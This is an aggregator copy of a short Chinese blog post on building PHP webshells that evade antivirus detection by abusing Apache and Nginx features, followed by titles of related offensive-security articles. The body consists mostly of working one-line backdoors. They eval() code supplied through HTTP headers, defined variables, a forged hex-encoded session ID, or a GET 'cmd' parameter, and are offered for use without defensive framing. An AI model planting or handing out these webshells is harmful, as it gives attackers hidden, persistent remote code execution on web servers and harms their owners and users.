12

PHP利用Apache、Nginx的特性实现免杀Webshell

 3 years ago
source link: https://y4er.com/post/apache-nginx-webshell/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client
1 min read

PHP利用Apache、Nginx的特性实现免杀Webshell

2019-01-25

get_defined_vars()getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell。 前几天看到的,一直忘记写,填坑。

环境函数用法nginxget_defined_vars()返回由所有已定义变量所组成的数组apachegetallheaders()获取全部 HTTP 请求头信息

apache环境

<?php
eval(next(getallheaders())); 
?>

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

另外一种通过执行伪造的sessionid值,进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

report

Recommend

  • 97
    • www.freebuf.com 6 years ago
    • Cache

    利用“进程注入”实现无文件WebShell

    利用“进程注入”实现无文件WebShell

  • 134
    • Github github.com 5 years ago
    • Cache

    GitHub - yzddmr6/webshell-venom: 免杀webshell无限生成工具

    README.md 2019.6.7 更新日志 1.原项目名称 "利用随机异或无限免杀d盾" 更改为 "webshell-venom" 2.增添aspx免杀生成脚本...

  • 17
    • 新浪科技 tech.sina.com.cn 5 years ago
    • Cache

    利用Metasploit制作免杀木马

    新浪科技讯 3月24日晚间消息,据《晚点LatePost》报道,滴滴高级副总裁兼普惠出行与服务事业群总经理付军华离职,滴滴方面未予置评。 资料显示,付军华曾在 联想 任职负责财务相关工作。于2015年9月加入滴滴,任滴滴...

  • 31
    • www.landgrey.me 4 years ago
    • Cache

    利用 intercetor 注入 spring 内存 webshell

    0x00:前言 在工作中,我遇到一个基于 spring boot 框架开发,并且可以执行任意代码的 Restful Api 漏洞环境。目标机器有安全限制无法连接外网。这时候,一种方便后续继续操作或者说长期驻留后门的...

  • 4
    • y4er.com 4 years ago
    • Cache

    C#免杀之自实现DNS服务器传输shellcode

    C#免杀之自实现DNS服务器传输shellcodeShare on: 相比于http协议,dns协议有着更好的隐蔽性。类比cs的dns beacon,我们可以自己实现一个dns服务器来传输shellcode。C#拥有一个优秀的第三方库ARSoft.Tools.Net。我们可以使用他...

  • 12
    • www.mi1k7ea.com 3 years ago
    • Cache

    通过spl_autoload_register实现PHP免杀WebShell

    通过spl_autoload_register实现PHP免杀WebShell 2021-04-21 / 0x00 前言参考自:

  • 20
    • 3gstudent.github.io 3 years ago
    • Cache

    渗透技巧——利用虚拟文件隐藏ASP.NET Webshell

    渗透技巧——利用虚拟文件隐藏ASP.NET Webshell 15 Mar 20210x00 前言 通过ASP.NET的VirtualPathProvider类能够创建虚拟文件,实现以下效果:虚拟文件不存在于服务器的文件系统,但是能够对其动态编译并提供访问服务。

  • 6
    • www.leavesongs.com 3 years ago
    • Cache

    利用redis写webshell

    利用redis写webshell Phithon 2015 三月 13 01:16 阅读:21397 ...

  • 8
    • 3gstudent.github.io 3 years ago
    • Cache

    Java利用技巧——通过反射实现webshell编译文件的自删除

    Java利用技巧——通过反射实现webshell编译文件的自删除 12 Jan 2022 0x00 前言 我们知道,当我们访问jsp文件时,Java环境会先将jsp文件转换成.class字节码文件,再由Java虚拟机进行加载,这导致了Java服务器上会生...

  • 8
    • paper.seebug.org 1 year ago
    • Cache

    PHP 从零学习到 Webshell 免杀手册

    作者:曾哥 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:[email protected] 一、PHP相关资料 二、PHP函数速查 0 PHP基础

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK